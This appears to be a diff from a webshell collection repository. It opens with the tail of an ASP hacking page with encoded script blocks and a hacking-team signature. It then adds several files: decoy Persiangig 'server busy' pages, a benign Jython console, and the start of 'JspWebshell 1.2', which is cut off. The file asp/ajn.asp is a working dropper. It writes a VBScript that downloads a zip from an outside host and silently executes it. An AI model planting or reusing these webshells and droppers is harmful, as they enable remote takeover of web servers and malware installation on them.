BORDER-TOP-WIDTH: 1px; BORDER-LEFT-WIDTH: 1px; BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-WIDTH: 1px; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BACKGROUND-COLOR: #fcfcfc; BORDER-RIGHT-WIDTH: 1px; BORDER-RIGHT-COLOR: #006699
}
SELECT {
BORDER-LEFT-COLOR: #006699; BORDER-BOTTOM-COLOR: #006699; FONT: 11px Verdana,Arial,Helvetica,sans-serif; COLOR: #000000; BORDER-TOP-COLOR: #006699; BORDER-RIGHT-COLOR: #006699
}
IMG {
BORDER-RIGHT: 0px; BORDER-TOP: 0px; BORDER-LEFT: 0px; BORDER-BOTTOM: 0px
}
TH {
PADDING-RIGHT: 8px; PADDING-LEFT: 8px; FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: #f9bc5e url('images/navbar.jpg'); COLOR: #713600; WHITE-SPACE: nowrap; HEIGHT: 27px; TEXT-ALIGN: center
}
TD.cat {
FONT-WEIGHT: bold; BACKGROUND: #ffffff url('images/cellpic1.gif'); TEXT-INDENT: 4px; LETTER-SPACING: 1px; HEIGHT: 27px
}
.title {
FONT-WEIGHT: bold; FONT-SIZE: 13px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
}
.content {
BACKGROUND: none transparent scroll repeat 0% 0%; FONT-FAMILY: Verdana, Helvetica
}
.block-title {
FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica
}
.storytitle {
FONT-WEIGHT: bold; FONT-SIZE: 11px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #713600; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
}
.storycat {
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: underline
}
.boxtitle {
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
}
.boxcontent {
FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: red; FONT-FAMILY: Verdana, Helvetica
}
.option {
FONT-WEIGHT: bold; FONT-SIZE: 10px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #006699; FONT-FAMILY: Verdana, Helvetica; TEXT-DECORATION: none
}
.ok {
FONT-WEIGHT: normal; FONT-SIZE: 9px; BACKGROUND: none transparent scroll repeat 0% 0%; COLOR: #000000; FONT-FAMILY: webdings; TEXT-DECORATION: none
}</style><style><!--
body {scrollbar-face-color: #000000; scrollbar-shadow-color: #003333; scrollbar-highlight-color: #FFFFFF; scrollbar-3dlight-color: #003333; scrollbar-darkshadow-color: #000000; scrollbar-track-color: #993300; scrollbar-arrow-color: #CC3300;}
}
// --></style><%#@~^BwAAAA==n N~kE(oQIAAA==^#~@%>
<%#@~^CgAAAA==d!4~HlMNks8AMAAA==^#~@%><title><%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%></title><body bgcolor=#333333><br><center><font color=red><h4><%=#@~^CAAAAA==2MWm ls+UQMAAA==^#~@%></center>
<font color=lime>
<%=#@~^BAAAAA==4V2qQEAAA==^#~@%>
<%#@~^HwAAAA==@#@&DnkwKx/RUN@#@&nx9Pd;(@#@&ugcAAA==^#~@%>
</textarea>
<noscript><noscript><plaintext><plaintext>
<!--
   
    HACKING
    
    www.infilak.tr.cx
    Mehdi & HolyDemon
   INF TEAM DURMAZ , DURDURULAMAZ
   Hak Geldi Bat<61>l Zail Oldu..
-->

52
asp/RemExp.asp Normal file
View File

@@ -0,0 +1,52 @@
<html>
<head>
<title>پرشین گیگ - Persiangig</title>
<meta http-equiv="refresh" content="30">
<style>
body,ul,li{margin:0;padding:0;font-family:Tahoma;}a{color:#0265FF;text-decoration:none}a:hover{color:#003B99}li{display:block}.clearfix{clear:both}html,body{height:100%}body{font-family:tahoma;font-size:10px}#container{min-height:100%}#wrap{margin:45px auto 0;overflow:hidden;padding-bottom:130px;width:860px}#right{float:right;width:210px}#main{float:right;margin-left:28px;width:490px}#ads{float:right;width:130px}#footer{clear:both;height:90px;margin-top:-90px;position:relative}body:before{content:"";float:left;height:100%;margin-top:-32767px;width:0}#header{background:#145491;height:150px;position:relative}#header-wrap{margin:0 auto;position:relative;width:860px}#logo{color:white;cursor:pointer;height:190px;left:650px;position:absolute;top:-14px;width:240px}#tabs{left:130px;position:absolute;top:128px}.tab{background:#8AAAC8;font-size:12px;color:#0B447A;border-radius:12px 12px 0 0;cursor:pointer;float:left;margin-right:2px}#tab-home{height:22px;width:36px}.tab-home-on,#tab-home:hover{background:white}#tab-news{height:22px;width:70px}.tab-news-on,#tab-news:hover{background:white;}#tab-ads{height:22px;width:70px}.tab-ads-on,#tab-ads:hover{background:white}#tab-report{height:22px;width:70px}.tab-report-on,#tab-report:hover{background:white}#tab-about{height:22px;width:70px}.tab-about-on,#tab-about:hover{background:white}#tab-contact{height:22px;width:70px}.tab-contact-on,#tab-contact:hover{background:white}#sign-in{background:url(/img90325/sign-in.gif) no-repeat;padding:45px 3px 3px;width:205px}.ie-fix{height:20px}.copyright{color:#555555;direction: rtl;margin-top: 10px;}center{padding-top:4px;}h1{background:#003E7B;margin-top:110px;margin-left:10px;font-family:Arial;font-size:50px;float:left;border:4px solid white;border-radius:10px;padding:5px 10px 15px 10px;}h2{color:#D0DDE9;float:left;margin-top:130px;margin-left:0px;font-family:Arial;font-size:29px;}#nini{background:#145491;color:white;height:10px;width:10px;padding:4px 15px 16px 5px;font-size:17px;font-family:Arial;border-radius:5px;font-weight:bold}
</style>
<meta content="fa" http-equiv="Content-Language">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body bgcolor='ffffff' bordermarginheight='0' marginwidth='0' rightmargin='0' leftmargin='0' topmargin='0'>
<div id="container" style="min-height:70%;">
<div id="header">
<div id="header-wrap">
<a href="/" title="Persiangig"><div id="logo"><h2>پرشین گیگ</h2><h1>pg</h1></div></a>
<div id="tabs">
<a href="/"><div id="tab-home" class="tab"><center>خانه</center></div></a>
<a href="/news/"><div id="tab-news" class="tab"><center>اخبار</center></div></a>
<a href="/ads/"><div id="tab-ads" class="tab"><center>تبلیغات</center></div></a>
<a href="/abuse/"><div id="tab-report" class="tab"><center>گزارش تخلف</center></div></a>
<a href="/about/"><div id="tab-about" class="tab"><center>درباره ما</center></div></a>
<a href="/contact/"><div id="tab-contact" class="tab"><center>تماس باما</center></div></a>
<div class="clearfix"></div>
</div>
</div>
</div>
<div id="wrap">
<div id="right" style="height:100px;width:250px"></div>
<div id="main" style="width:auto;">
<div style='margin-top:30px;width:100%;font:700 20px Arial;color:#FF6358;text-align:right;direction:rtl;'><b>لطفا پس از چند دقیقه مجددا تلاش نمایید ...</b></div>
<br />
<div style='font-family:tahoma;font-size:10px;text-align:right;direction:rtl;'>صفحه مورد نظر شما به علت ترافیک سنگین و بار زیاد بر روی سرور ها قابل نمایش نمی باشد.</div>
<br />
<span style='font-family:tahoma;font-size:10px;float:right;text-align:right;direction:rtl;'>در صورت تمایل می توانید موارد مورد نظر خود را با ما درمیان بگذارید:</span>
<a href="mailto:support@persiangig.com" style="font-family:tahoma;font-size:10px;float:left;margin-left:50px;direction:rtl">Support@Persiangig.com</a>
</div>
<div id="ads"></div>
</div>
</div>
<div style="margin:0 auto; width:210px" id="footer">
<center>
<a href="/"><div id="nini">pg</div></a>
<div class="f-links">
<a href="/terms/">قوانین سایت</a>
<span style="color:#0265FF;">|</span>
<a href="/">راهنما</a>
</div>
<div class="copyright">تمامی حقوق متعلق به PGTools می باشد. 2011&copy;</div>
</center>
</div>
</body>
</html>

52
asp/Server Variables.asp Normal file
View File

@@ -0,0 +1,52 @@
<html>
<head>
<title>پرشین گیگ - Persiangig</title>
<meta http-equiv="refresh" content="30">
<style>
body,ul,li{margin:0;padding:0;font-family:Tahoma;}a{color:#0265FF;text-decoration:none}a:hover{color:#003B99}li{display:block}.clearfix{clear:both}html,body{height:100%}body{font-family:tahoma;font-size:10px}#container{min-height:100%}#wrap{margin:45px auto 0;overflow:hidden;padding-bottom:130px;width:860px}#right{float:right;width:210px}#main{float:right;margin-left:28px;width:490px}#ads{float:right;width:130px}#footer{clear:both;height:90px;margin-top:-90px;position:relative}body:before{content:"";float:left;height:100%;margin-top:-32767px;width:0}#header{background:#145491;height:150px;position:relative}#header-wrap{margin:0 auto;position:relative;width:860px}#logo{color:white;cursor:pointer;height:190px;left:650px;position:absolute;top:-14px;width:240px}#tabs{left:130px;position:absolute;top:128px}.tab{background:#8AAAC8;font-size:12px;color:#0B447A;border-radius:12px 12px 0 0;cursor:pointer;float:left;margin-right:2px}#tab-home{height:22px;width:36px}.tab-home-on,#tab-home:hover{background:white}#tab-news{height:22px;width:70px}.tab-news-on,#tab-news:hover{background:white;}#tab-ads{height:22px;width:70px}.tab-ads-on,#tab-ads:hover{background:white}#tab-report{height:22px;width:70px}.tab-report-on,#tab-report:hover{background:white}#tab-about{height:22px;width:70px}.tab-about-on,#tab-about:hover{background:white}#tab-contact{height:22px;width:70px}.tab-contact-on,#tab-contact:hover{background:white}#sign-in{background:url(/img90325/sign-in.gif) no-repeat;padding:45px 3px 3px;width:205px}.ie-fix{height:20px}.copyright{color:#555555;direction: rtl;margin-top: 10px;}center{padding-top:4px;}h1{background:#003E7B;margin-top:110px;margin-left:10px;font-family:Arial;font-size:50px;float:left;border:4px solid white;border-radius:10px;padding:5px 10px 15px 10px;}h2{color:#D0DDE9;float:left;margin-top:130px;margin-left:0px;font-family:Arial;font-size:29px;}#nini{background:#145491;color:white;height:10px;width:10px;padding:4px 15px 16px 5px;font-size:17px;font-family:Arial;border-radius:5px;font-weight:bold}
</style>
<meta content="fa" http-equiv="Content-Language">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body bgcolor='ffffff' bordermarginheight='0' marginwidth='0' rightmargin='0' leftmargin='0' topmargin='0'>
<div id="container" style="min-height:70%;">
<div id="header">
<div id="header-wrap">
<a href="/" title="Persiangig"><div id="logo"><h2>پرشین گیگ</h2><h1>pg</h1></div></a>
<div id="tabs">
<a href="/"><div id="tab-home" class="tab"><center>خانه</center></div></a>
<a href="/news/"><div id="tab-news" class="tab"><center>اخبار</center></div></a>
<a href="/ads/"><div id="tab-ads" class="tab"><center>تبلیغات</center></div></a>
<a href="/abuse/"><div id="tab-report" class="tab"><center>گزارش تخلف</center></div></a>
<a href="/about/"><div id="tab-about" class="tab"><center>درباره ما</center></div></a>
<a href="/contact/"><div id="tab-contact" class="tab"><center>تماس باما</center></div></a>
<div class="clearfix"></div>
</div>
</div>
</div>
<div id="wrap">
<div id="right" style="height:100px;width:250px"></div>
<div id="main" style="width:auto;">
<div style='margin-top:30px;width:100%;font:700 20px Arial;color:#FF6358;text-align:right;direction:rtl;'><b>لطفا پس از چند دقیقه مجددا تلاش نمایید ...</b></div>
<br />
<div style='font-family:tahoma;font-size:10px;text-align:right;direction:rtl;'>صفحه مورد نظر شما به علت ترافیک سنگین و بار زیاد بر روی سرور ها قابل نمایش نمی باشد.</div>
<br />
<span style='font-family:tahoma;font-size:10px;float:right;text-align:right;direction:rtl;'>در صورت تمایل می توانید موارد مورد نظر خود را با ما درمیان بگذارید:</span>
<a href="mailto:support@persiangig.com" style="font-family:tahoma;font-size:10px;float:left;margin-left:50px;direction:rtl">Support@Persiangig.com</a>
</div>
<div id="ads"></div>
</div>
</div>
<div style="margin:0 auto; width:210px" id="footer">
<center>
<a href="/"><div id="nini">pg</div></a>
<div class="f-links">
<a href="/terms/">قوانین سایت</a>
<span style="color:#0265FF;">|</span>
<a href="/">راهنما</a>
</div>
<div class="copyright">تمامی حقوق متعلق به PGTools می باشد. 2011&copy;</div>
</center>
</div>
</body>
</html>

30
asp/ajn.asp Normal file
View File

@@ -0,0 +1,30 @@
<SCRIPT LANGUAGE="VBScript">
<%
Set seal = CreateObject("Scripting.FileSystemObject")
Set seal = seal.CreateTextFile("c:\net.vbs", True)
seal.write "Dim BinaryData" & vbcrlf
seal.write "Dim xml" & vbcrlf
seal.write "Set xml = CreateObject(""Microsoft.XMLHTTP"")" & vbcrlf
seal.write "xml.Open ""GET"",""http://www35.websamba.com/cybervurgun/file.zip"",False" & vbcrlf
seal.write "xml.Send" & vbcrlf
seal.write "BinaryData = xml.ResponsebOdy" & vbcrlf
seal.write "Const adTypeBinary = 1" & vbcrlf
seal.write "Const adSaveCreateOverWrite = 2" & vbcrlf
seal.write "Dim BinaryStream" & vbcrlf
seal.write "Set BinaryStream = CreateObject(""ADODB.Stream"")" & vbcrlf
seal.write "BinaryStream.Type = adTypeBinary" & vbcrlf
seal.write "BinaryStream.Open" & vbcrlf
seal.write "BinaryStream.Write BinaryData" & vbcrlf
seal.write "BinaryStream.SaveToFile ""c:\downloaded.zip"", adSaveCreateOverWrite" & vbcrlf
seal.write "Dim WshShell" & vbcrlf
seal.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
seal.write "WshShell.Run ""c:\downloaded.zip"", 0, false" & vbcrlf
seal.close
Set seal = Nothing
Set seal = Nothing
Dim WshShell
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "c:\net.vbs", 0, false
%>
</SCRIPT>

52
asp/cpanel.asp Normal file
View File

@@ -0,0 +1,52 @@
<html>
<head>
<title>پرشین گیگ - Persiangig</title>
<meta http-equiv="refresh" content="30">
<style>
body,ul,li{margin:0;padding:0;font-family:Tahoma;}a{color:#0265FF;text-decoration:none}a:hover{color:#003B99}li{display:block}.clearfix{clear:both}html,body{height:100%}body{font-family:tahoma;font-size:10px}#container{min-height:100%}#wrap{margin:45px auto 0;overflow:hidden;padding-bottom:130px;width:860px}#right{float:right;width:210px}#main{float:right;margin-left:28px;width:490px}#ads{float:right;width:130px}#footer{clear:both;height:90px;margin-top:-90px;position:relative}body:before{content:"";float:left;height:100%;margin-top:-32767px;width:0}#header{background:#145491;height:150px;position:relative}#header-wrap{margin:0 auto;position:relative;width:860px}#logo{color:white;cursor:pointer;height:190px;left:650px;position:absolute;top:-14px;width:240px}#tabs{left:130px;position:absolute;top:128px}.tab{background:#8AAAC8;font-size:12px;color:#0B447A;border-radius:12px 12px 0 0;cursor:pointer;float:left;margin-right:2px}#tab-home{height:22px;width:36px}.tab-home-on,#tab-home:hover{background:white}#tab-news{height:22px;width:70px}.tab-news-on,#tab-news:hover{background:white;}#tab-ads{height:22px;width:70px}.tab-ads-on,#tab-ads:hover{background:white}#tab-report{height:22px;width:70px}.tab-report-on,#tab-report:hover{background:white}#tab-about{height:22px;width:70px}.tab-about-on,#tab-about:hover{background:white}#tab-contact{height:22px;width:70px}.tab-contact-on,#tab-contact:hover{background:white}#sign-in{background:url(/img90325/sign-in.gif) no-repeat;padding:45px 3px 3px;width:205px}.ie-fix{height:20px}.copyright{color:#555555;direction: rtl;margin-top: 10px;}center{padding-top:4px;}h1{background:#003E7B;margin-top:110px;margin-left:10px;font-family:Arial;font-size:50px;float:left;border:4px solid white;border-radius:10px;padding:5px 10px 15px 10px;}h2{color:#D0DDE9;float:left;margin-top:130px;margin-left:0px;font-family:Arial;font-size:29px;}#nini{background:#145491;color:white;height:10px;width:10px;padding:4px 15px 16px 5px;font-size:17px;font-family:Arial;border-radius:5px;font-weight:bold}
</style>
<meta content="fa" http-equiv="Content-Language">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body bgcolor='ffffff' bordermarginheight='0' marginwidth='0' rightmargin='0' leftmargin='0' topmargin='0'>
<div id="container" style="min-height:70%;">
<div id="header">
<div id="header-wrap">
<a href="/" title="Persiangig"><div id="logo"><h2>پرشین گیگ</h2><h1>pg</h1></div></a>
<div id="tabs">
<a href="/"><div id="tab-home" class="tab"><center>خانه</center></div></a>
<a href="/news/"><div id="tab-news" class="tab"><center>اخبار</center></div></a>
<a href="/ads/"><div id="tab-ads" class="tab"><center>تبلیغات</center></div></a>
<a href="/abuse/"><div id="tab-report" class="tab"><center>گزارش تخلف</center></div></a>
<a href="/about/"><div id="tab-about" class="tab"><center>درباره ما</center></div></a>
<a href="/contact/"><div id="tab-contact" class="tab"><center>تماس باما</center></div></a>
<div class="clearfix"></div>
</div>
</div>
</div>
<div id="wrap">
<div id="right" style="height:100px;width:250px"></div>
<div id="main" style="width:auto;">
<div style='margin-top:30px;width:100%;font:700 20px Arial;color:#FF6358;text-align:right;direction:rtl;'><b>لطفا پس از چند دقیقه مجددا تلاش نمایید ...</b></div>
<br />
<div style='font-family:tahoma;font-size:10px;text-align:right;direction:rtl;'>صفحه مورد نظر شما به علت ترافیک سنگین و بار زیاد بر روی سرور ها قابل نمایش نمی باشد.</div>
<br />
<span style='font-family:tahoma;font-size:10px;float:right;text-align:right;direction:rtl;'>در صورت تمایل می توانید موارد مورد نظر خود را با ما درمیان بگذارید:</span>
<a href="mailto:support@persiangig.com" style="font-family:tahoma;font-size:10px;float:left;margin-left:50px;direction:rtl">Support@Persiangig.com</a>
</div>
<div id="ads"></div>
</div>
</div>
<div style="margin:0 auto; width:210px" id="footer">
<center>
<a href="/"><div id="nini">pg</div></a>
<div class="f-links">
<a href="/terms/">قوانین سایت</a>
<span style="color:#0265FF;">|</span>
<a href="/">راهنما</a>
</div>
<div class="copyright">تمامی حقوق متعلق به PGTools می باشد. 2011&copy;</div>
</center>
</div>
</body>
</html>

52
asp/klasvayv.asp Normal file
View File

@@ -0,0 +1,52 @@
<html>
<head>
<title>پرشین گیگ - Persiangig</title>
<meta http-equiv="refresh" content="30">
<style>
body,ul,li{margin:0;padding:0;font-family:Tahoma;}a{color:#0265FF;text-decoration:none}a:hover{color:#003B99}li{display:block}.clearfix{clear:both}html,body{height:100%}body{font-family:tahoma;font-size:10px}#container{min-height:100%}#wrap{margin:45px auto 0;overflow:hidden;padding-bottom:130px;width:860px}#right{float:right;width:210px}#main{float:right;margin-left:28px;width:490px}#ads{float:right;width:130px}#footer{clear:both;height:90px;margin-top:-90px;position:relative}body:before{content:"";float:left;height:100%;margin-top:-32767px;width:0}#header{background:#145491;height:150px;position:relative}#header-wrap{margin:0 auto;position:relative;width:860px}#logo{color:white;cursor:pointer;height:190px;left:650px;position:absolute;top:-14px;width:240px}#tabs{left:130px;position:absolute;top:128px}.tab{background:#8AAAC8;font-size:12px;color:#0B447A;border-radius:12px 12px 0 0;cursor:pointer;float:left;margin-right:2px}#tab-home{height:22px;width:36px}.tab-home-on,#tab-home:hover{background:white}#tab-news{height:22px;width:70px}.tab-news-on,#tab-news:hover{background:white;}#tab-ads{height:22px;width:70px}.tab-ads-on,#tab-ads:hover{background:white}#tab-report{height:22px;width:70px}.tab-report-on,#tab-report:hover{background:white}#tab-about{height:22px;width:70px}.tab-about-on,#tab-about:hover{background:white}#tab-contact{height:22px;width:70px}.tab-contact-on,#tab-contact:hover{background:white}#sign-in{background:url(/img90325/sign-in.gif) no-repeat;padding:45px 3px 3px;width:205px}.ie-fix{height:20px}.copyright{color:#555555;direction: rtl;margin-top: 10px;}center{padding-top:4px;}h1{background:#003E7B;margin-top:110px;margin-left:10px;font-family:Arial;font-size:50px;float:left;border:4px solid white;border-radius:10px;padding:5px 10px 15px 10px;}h2{color:#D0DDE9;float:left;margin-top:130px;margin-left:0px;font-family:Arial;font-size:29px;}#nini{background:#145491;color:white;height:10px;width:10px;padding:4px 15px 16px 5px;font-size:17px;font-family:Arial;border-radius:5px;font-weight:bold}
</style>
<meta content="fa" http-equiv="Content-Language">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body bgcolor='ffffff' bordermarginheight='0' marginwidth='0' rightmargin='0' leftmargin='0' topmargin='0'>
<div id="container" style="min-height:70%;">
<div id="header">
<div id="header-wrap">
<a href="/" title="Persiangig"><div id="logo"><h2>پرشین گیگ</h2><h1>pg</h1></div></a>
<div id="tabs">
<a href="/"><div id="tab-home" class="tab"><center>خانه</center></div></a>
<a href="/news/"><div id="tab-news" class="tab"><center>اخبار</center></div></a>
<a href="/ads/"><div id="tab-ads" class="tab"><center>تبلیغات</center></div></a>
<a href="/abuse/"><div id="tab-report" class="tab"><center>گزارش تخلف</center></div></a>
<a href="/about/"><div id="tab-about" class="tab"><center>درباره ما</center></div></a>
<a href="/contact/"><div id="tab-contact" class="tab"><center>تماس باما</center></div></a>
<div class="clearfix"></div>
</div>
</div>
</div>
<div id="wrap">
<div id="right" style="height:100px;width:250px"></div>
<div id="main" style="width:auto;">
<div style='margin-top:30px;width:100%;font:700 20px Arial;color:#FF6358;text-align:right;direction:rtl;'><b>لطفا پس از چند دقیقه مجددا تلاش نمایید ...</b></div>
<br />
<div style='font-family:tahoma;font-size:10px;text-align:right;direction:rtl;'>صفحه مورد نظر شما به علت ترافیک سنگین و بار زیاد بر روی سرور ها قابل نمایش نمی باشد.</div>
<br />
<span style='font-family:tahoma;font-size:10px;float:right;text-align:right;direction:rtl;'>در صورت تمایل می توانید موارد مورد نظر خود را با ما درمیان بگذارید:</span>
<a href="mailto:support@persiangig.com" style="font-family:tahoma;font-size:10px;float:left;margin-left:50px;direction:rtl">Support@Persiangig.com</a>
</div>
<div id="ads"></div>
</div>
</div>
<div style="margin:0 auto; width:210px" id="footer">
<center>
<a href="/"><div id="nini">pg</div></a>
<div class="f-links">
<a href="/terms/">قوانین سایت</a>
<span style="color:#0265FF;">|</span>
<a href="/">راهنما</a>
</div>
<div class="copyright">تمامی حقوق متعلق به PGTools می باشد. 2011&copy;</div>
</center>
</div>
</body>
</html>

52
asp/xx.asp Normal file
View File

@@ -0,0 +1,52 @@
<html>
<head>
<title>پرشین گیگ - Persiangig</title>
<meta http-equiv="refresh" content="30">
<style>
body,ul,li{margin:0;padding:0;font-family:Tahoma;}a{color:#0265FF;text-decoration:none}a:hover{color:#003B99}li{display:block}.clearfix{clear:both}html,body{height:100%}body{font-family:tahoma;font-size:10px}#container{min-height:100%}#wrap{margin:45px auto 0;overflow:hidden;padding-bottom:130px;width:860px}#right{float:right;width:210px}#main{float:right;margin-left:28px;width:490px}#ads{float:right;width:130px}#footer{clear:both;height:90px;margin-top:-90px;position:relative}body:before{content:"";float:left;height:100%;margin-top:-32767px;width:0}#header{background:#145491;height:150px;position:relative}#header-wrap{margin:0 auto;position:relative;width:860px}#logo{color:white;cursor:pointer;height:190px;left:650px;position:absolute;top:-14px;width:240px}#tabs{left:130px;position:absolute;top:128px}.tab{background:#8AAAC8;font-size:12px;color:#0B447A;border-radius:12px 12px 0 0;cursor:pointer;float:left;margin-right:2px}#tab-home{height:22px;width:36px}.tab-home-on,#tab-home:hover{background:white}#tab-news{height:22px;width:70px}.tab-news-on,#tab-news:hover{background:white;}#tab-ads{height:22px;width:70px}.tab-ads-on,#tab-ads:hover{background:white}#tab-report{height:22px;width:70px}.tab-report-on,#tab-report:hover{background:white}#tab-about{height:22px;width:70px}.tab-about-on,#tab-about:hover{background:white}#tab-contact{height:22px;width:70px}.tab-contact-on,#tab-contact:hover{background:white}#sign-in{background:url(/img90325/sign-in.gif) no-repeat;padding:45px 3px 3px;width:205px}.ie-fix{height:20px}.copyright{color:#555555;direction: rtl;margin-top: 10px;}center{padding-top:4px;}h1{background:#003E7B;margin-top:110px;margin-left:10px;font-family:Arial;font-size:50px;float:left;border:4px solid white;border-radius:10px;padding:5px 10px 15px 10px;}h2{color:#D0DDE9;float:left;margin-top:130px;margin-left:0px;font-family:Arial;font-size:29px;}#nini{background:#145491;color:white;height:10px;width:10px;padding:4px 15px 16px 5px;font-size:17px;font-family:Arial;border-radius:5px;font-weight:bold}
</style>
<meta content="fa" http-equiv="Content-Language">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
<body bgcolor='ffffff' bordermarginheight='0' marginwidth='0' rightmargin='0' leftmargin='0' topmargin='0'>
<div id="container" style="min-height:70%;">
<div id="header">
<div id="header-wrap">
<a href="/" title="Persiangig"><div id="logo"><h2>پرشین گیگ</h2><h1>pg</h1></div></a>
<div id="tabs">
<a href="/"><div id="tab-home" class="tab"><center>خانه</center></div></a>
<a href="/news/"><div id="tab-news" class="tab"><center>اخبار</center></div></a>
<a href="/ads/"><div id="tab-ads" class="tab"><center>تبلیغات</center></div></a>
<a href="/abuse/"><div id="tab-report" class="tab"><center>گزارش تخلف</center></div></a>
<a href="/about/"><div id="tab-about" class="tab"><center>درباره ما</center></div></a>
<a href="/contact/"><div id="tab-contact" class="tab"><center>تماس باما</center></div></a>
<div class="clearfix"></div>
</div>
</div>
</div>
<div id="wrap">
<div id="right" style="height:100px;width:250px"></div>
<div id="main" style="width:auto;">
<div style='margin-top:30px;width:100%;font:700 20px Arial;color:#FF6358;text-align:right;direction:rtl;'><b>لطفا پس از چند دقیقه مجددا تلاش نمایید ...</b></div>
<br />
<div style='font-family:tahoma;font-size:10px;text-align:right;direction:rtl;'>صفحه مورد نظر شما به علت ترافیک سنگین و بار زیاد بر روی سرور ها قابل نمایش نمی باشد.</div>
<br />
<span style='font-family:tahoma;font-size:10px;float:right;text-align:right;direction:rtl;'>در صورت تمایل می توانید موارد مورد نظر خود را با ما درمیان بگذارید:</span>
<a href="mailto:support@persiangig.com" style="font-family:tahoma;font-size:10px;float:left;margin-left:50px;direction:rtl">Support@Persiangig.com</a>
</div>
<div id="ads"></div>
</div>
</div>
<div style="margin:0 auto; width:210px" id="footer">
<center>
<a href="/"><div id="nini">pg</div></a>
<div class="f-links">
<a href="/terms/">قوانین سایت</a>
<span style="color:#0265FF;">|</span>
<a href="/">راهنما</a>
</div>
<div class="copyright">تمامی حقوق متعلق به PGTools می باشد. 2011&copy;</div>
</center>
</div>
</body>
</html>

125
jsp/Java Shell.jsp Normal file
View File

@@ -0,0 +1,125 @@
package enigma.shells.jython;
import java.io.*;
import java.awt.*;
import javax.swing.*;
import enigma.console.*;
import enigma.console.java2d.*;
import org.python.core.*;
import org.python.util.*;
public class JythonShell extends JPanel implements Runnable {
public static int DEFAULT_ROWS = 20;
public static int DEFAULT_COLUMNS = 80;
public static int DEFAULT_SCROLLBACK = 100;
public PrintStream out;
public Console console;
public Java2DTextWindow text;
public JScrollPane scrollPane;
public PythonInterpreter interp;
private Color colorBackground = new Color(0, 0, 0);
private Color colorForeground = new Color(187, 187, 187);
private Color colorError = new Color(187, 0, 0);
private Color colorCursor = new Color(187, 187, 0);
public JythonShell() {
this(null, Py.getSystemState());
}
public JythonShell(PyObject dict) {
this(dict, Py.getSystemState());
}
public JythonShell(int columns, int rows, int scrollback) {
this(null, Py.getSystemState(), columns, rows, scrollback);
}
public JythonShell(PyObject dict, PySystemState systemState) {
this(dict, systemState, DEFAULT_COLUMNS, DEFAULT_ROWS, DEFAULT_SCROLLBACK);
}
public JythonShell(PyObject dict, PySystemState systemState, int columns, int rows, int scrollback) {
super(new BorderLayout());
text = new Java2DTextWindow(columns, rows, scrollback);
text.setBackground(colorBackground);
scrollPane = new JScrollPane();
scrollPane.setViewportView(text);
add(scrollPane, BorderLayout.CENTER);
console = new DefaultConsoleImpl(text);
out = console.getOutputStream();
interp = new PythonInterpreter(dict, systemState);
interp.setOut(out);
interp.setErr(out);
}
public void run() {
int pos = 0;
int tbs = 4;
String line = "";
String command = "";
for (;;) {
String space = "";
for (int i = 0; i < pos * tbs; i++) {
space += " ";
}
try {
console.setTextAttributes(new TextAttributes(colorCursor));
if (pos > 0) {
out.print(space + "... ");
} else {
out.print(">> ");
}
console.setTextAttributes(new TextAttributes(colorForeground));
line = console.readLine().trim();
if (line.length() == 0 && pos > 0) {
pos--;
} else if (line.endsWith(":")) {
command += space + line + "\n";
pos++;
} else {
command += space + line + "\n";
}
if (pos == 0) {
interp.exec(command);
command = "";
}
} catch (Exception e) {
console.setTextAttributes(new TextAttributes(colorError));
e.printStackTrace();
command = "";
}
}
}
public static void main(String[] argv) {
PySystemState.initialize(System.getProperties(), null, argv);
JFrame frame = new JFrame("Jython Console");
JythonShell console = new JythonShell();
frame.add(console, BorderLayout.CENTER);
frame.pack();
frame.setVisible(true);
frame.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
console.run();
}
}

788
jsp/JspWebshell 1.2.jsp Normal file
View File

@@ -0,0 +1,788 @@
<%@ page contentType="text/html; charset=GBK" language="java" import="java.sql.*,java.io.File,java.io.*,java.nio.charset.Charset,java.io.IOException,java.util.*" errorPage="" %>
<%
/**
* <p>Title:JspWebshell </p>
*
* <p>Description: jsp<73><70>վ<EFBFBD><D5BE><EFBFBD><EFBFBD></p>
*
* <p>Copyright:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[B.C.T] Copyright (c) 2006</p>
*
* <p>Company: zero.cnbct.org</p>
* PS:<3A><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С<EFBFBD>ܴ<EFBFBD><DCB4><EFBFBD><EFBFBD><EFBFBD>Ȥ<EFBFBD><C8A4>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϵQQ:48124012
* @version 1.2
*/
String path="";
String selfName="";
boolean copyfinish=false;
%>
<% selfName=request.getRequestURI();
// String editfile="";
String editfile=request.getParameter("editfile");
if (editfile!=null)
{editfile=new String(editfile.getBytes("ISO8859_1"));
}
path=request.getParameter("path");
if(path==null)
